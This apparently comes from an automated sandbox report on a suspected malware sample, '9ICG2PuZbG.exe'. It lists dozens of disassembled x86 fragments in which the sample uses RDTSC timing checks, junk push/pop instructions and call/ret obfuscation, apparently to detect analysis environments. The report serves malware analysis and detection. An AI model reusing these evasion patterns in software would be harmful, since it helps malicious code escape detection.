                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 369B3E second address: 369B54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 jg 00007F3A94CD4078h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 369B54 second address: 369B5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F3A9502B5E6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 369B5E second address: 369B62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 369B62 second address: 369B68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 36A157 second address: 36A15B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3604AB second address: 3604B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3604B3 second address: 3604B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3604B7 second address: 3604C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3604C0 second address: 3604C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 33EC23 second address: 33EC2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F3A9502B5E6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 36A53B second address: 36A547 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jne 00007F3A94CD4076h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 36AC37 second address: 36AC3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 36FAC7 second address: 36FAF3 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3A94CD4076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jg 00007F3A94CD4082h 0x00000014 mov eax, dword ptr [eax] 0x00000016 push eax 0x00000017 push edx 0x00000018 jl 00007F3A94CD407Ch 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 36FAF3 second address: 36FAF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 36FAF7 second address: 36FB1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD407Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e js 00007F3A94CD407Ch 0x00000014 jg 00007F3A94CD4076h 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 36E38C second address: 36E3AD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F3A9502B5F6h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ecx 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3772F8 second address: 377329 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3A94CD4076h 0x00000008 jbe 00007F3A94CD4076h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F3A94CD4087h 0x00000015 popad 0x00000016 push ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 jnc 00007F3A94CD4076h 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 377329 second address: 37732D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3406C3 second address: 3406CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3406CB second address: 340708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F3A9502B5EAh 0x0000000b pushad 0x0000000c popad 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F3A9502B5EFh 0x00000017 push ebx 0x00000018 jne 00007F3A9502B5E6h 0x0000001e jmp 00007F3A9502B5F4h 0x00000023 pop ebx 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 376AE0 second address: 376AE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 376AE4 second address: 376AEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 376DF3 second address: 376DFD instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3A94CD4076h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 376DFD second address: 376E09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 376E09 second address: 376E0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 376E0D second address: 376E3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnl 00007F3A9502B600h 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 376E3D second address: 376E4D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F3A94CD407Eh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 376F90 second address: 376F96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 376F96 second address: 376F9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 376F9C second address: 376FBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F3A9502B5F8h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 376FBE second address: 376FD6 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3A94CD4076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007F3A94CD407Eh 0x00000010 js 00007F3A94CD4076h 0x00000016 push edx 0x00000017 pop edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3799A7 second address: 3799AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3799AD second address: 3799B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 379C60 second address: 379C66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 37A31A second address: 37A320 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 37A320 second address: 37A325 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 37A381 second address: 37A385 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 37A658 second address: 37A66E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007F3A9502B5ECh 0x00000010 jng 00007F3A9502B5E6h 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 37A6F3 second address: 37A6F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 37A6F8 second address: 37A70D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007F3A9502B5E6h 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 37A70D second address: 37A711 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 37A711 second address: 37A717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 37A717 second address: 37A725 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A94CD407Ah 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 37AE89 second address: 37AE8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 37AE8D second address: 37AF3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3A94CD4084h 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f call 00007F3A94CD4083h 0x00000014 mov di, dx 0x00000017 pop edi 0x00000018 movzx edi, ax 0x0000001b push 00000000h 0x0000001d call 00007F3A94CD407Ah 0x00000022 jmp 00007F3A94CD4081h 0x00000027 pop esi 0x00000028 jmp 00007F3A94CD4089h 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push eax 0x00000032 call 00007F3A94CD4078h 0x00000037 pop eax 0x00000038 mov dword ptr [esp+04h], eax 0x0000003c add dword ptr [esp+04h], 0000001Ah 0x00000044 inc eax 0x00000045 push eax 0x00000046 ret 0x00000047 pop eax 0x00000048 ret 0x00000049 xchg eax, ebx 0x0000004a jmp 00007F3A94CD4085h 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 37AF3C second address: 37AF43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 37DFE7 second address: 37DFF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 37DFF5 second address: 37E073 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F3A9502B5E8h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 mov dword ptr [ebp+122D1CD2h], edi 0x0000002a push 00000000h 0x0000002c cld 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ecx 0x00000032 call 00007F3A9502B5E8h 0x00000037 pop ecx 0x00000038 mov dword ptr [esp+04h], ecx 0x0000003c add dword ptr [esp+04h], 00000014h 0x00000044 inc ecx 0x00000045 push ecx 0x00000046 ret 0x00000047 pop ecx 0x00000048 ret 0x00000049 mov si, dx 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007F3A9502B5EFh 0x00000054 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 37E073 second address: 37E078 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 37E078 second address: 37E07E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 37EB74 second address: 37EC10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD407Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F3A94CD4078h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov esi, 07CCD72Bh 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push eax 0x00000030 call 00007F3A94CD4078h 0x00000035 pop eax 0x00000036 mov dword ptr [esp+04h], eax 0x0000003a add dword ptr [esp+04h], 0000001Dh 0x00000042 inc eax 0x00000043 push eax 0x00000044 ret 0x00000045 pop eax 0x00000046 ret 0x00000047 call 00007F3A94CD407Bh 0x0000004c mov dword ptr [ebp+122D20B7h], esi 0x00000052 pop esi 0x00000053 mov dword ptr [ebp+122D2F63h], ebx 0x00000059 push 00000000h 0x0000005b mov dword ptr [ebp+122D2ED4h], eax 0x00000061 xchg eax, ebx 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007F3A94CD4087h 0x00000069 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 37E989 second address: 37E997 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 37EC10 second address: 37EC15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 380A38 second address: 380AD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jp 00007F3A9502B5E6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov dword ptr [ebp+12453EBEh], ebx 0x00000015 mov dword ptr [ebp+122D29C3h], edx 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push esi 0x00000020 call 00007F3A9502B5E8h 0x00000025 pop esi 0x00000026 mov dword ptr [esp+04h], esi 0x0000002a add dword ptr [esp+04h], 00000017h 0x00000032 inc esi 0x00000033 push esi 0x00000034 ret 0x00000035 pop esi 0x00000036 ret 0x00000037 mov dword ptr [ebp+124553D3h], edi 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push ebx 0x00000042 call 00007F3A9502B5E8h 0x00000047 pop ebx 0x00000048 mov dword ptr [esp+04h], ebx 0x0000004c add dword ptr [esp+04h], 0000001Dh 0x00000054 inc ebx 0x00000055 push ebx 0x00000056 ret 0x00000057 pop ebx 0x00000058 ret 0x00000059 jmp 00007F3A9502B5F8h 0x0000005e jmp 00007F3A9502B5EBh 0x00000063 xchg eax, ebx 0x00000064 push eax 0x00000065 push edx 0x00000066 jmp 00007F3A9502B5EBh 0x0000006b rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 380AD2 second address: 380AD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 380AD8 second address: 380ADC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 37FCFD second address: 37FD03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 37FD03 second address: 37FD07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 37FD07 second address: 37FD0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 381598 second address: 38159C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 37FD0B second address: 37FD3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jno 00007F3A94CD407Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F3A94CD4089h 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 38159C second address: 3815A6 instructions: 0x00000000 rdtsc 0x00000002 je 00007F3A9502B5E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3815A6 second address: 3815AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3815AC second address: 3815B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3815B0 second address: 3815B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3815B4 second address: 38160E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jmp 00007F3A9502B5F1h 0x00000010 jns 00007F3A9502B5E6h 0x00000016 push 00000000h 0x00000018 mov esi, dword ptr [ebp+122D1BFBh] 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push edx 0x00000023 call 00007F3A9502B5E8h 0x00000028 pop edx 0x00000029 mov dword ptr [esp+04h], edx 0x0000002d add dword ptr [esp+04h], 00000019h 0x00000035 inc edx 0x00000036 push edx 0x00000037 ret 0x00000038 pop edx 0x00000039 ret 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e pushad 0x0000003f popad 0x00000040 jc 00007F3A9502B5E6h 0x00000046 popad 0x00000047 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 385120 second address: 385124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 381E9B second address: 381EA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F3A9502B5E6h 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 385124 second address: 38512A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 38661B second address: 38661F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3857EE second address: 3857F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 38661F second address: 386625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3857F4 second address: 3857F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3857F8 second address: 38589A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a je 00007F3A9502B5E8h 0x00000010 push edx 0x00000011 pop edx 0x00000012 jg 00007F3A9502B5E8h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b nop 0x0000001c jmp 00007F3A9502B5EDh 0x00000021 push dword ptr fs:[00000000h] 0x00000028 movzx edi, cx 0x0000002b mov dword ptr fs:[00000000h], esp 0x00000032 mov dword ptr [ebp+122D2E7Ch], ebx 0x00000038 mov eax, dword ptr [ebp+122D1005h] 0x0000003e push 00000000h 0x00000040 push ebx 0x00000041 call 00007F3A9502B5E8h 0x00000046 pop ebx 0x00000047 mov dword ptr [esp+04h], ebx 0x0000004b add dword ptr [esp+04h], 0000001Ch 0x00000053 inc ebx 0x00000054 push ebx 0x00000055 ret 0x00000056 pop ebx 0x00000057 ret 0x00000058 mov edi, dword ptr [ebp+122D2C82h] 0x0000005e push FFFFFFFFh 0x00000060 add bl, 0000001Ch 0x00000063 nop 0x00000064 pushad 0x00000065 jmp 00007F3A9502B5F7h 0x0000006a push eax 0x0000006b push edx 0x0000006c jmp 00007F3A9502B5F2h 0x00000071 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3867E4 second address: 3867F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A94CD407Ch 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3867F4 second address: 3867F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3867F8 second address: 38680B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c jg 00007F3A94CD4076h 0x00000012 pop edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 38680B second address: 386827 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A9502B5F8h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 388738 second address: 38873C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 38873C second address: 388742 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3877ED second address: 3877F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
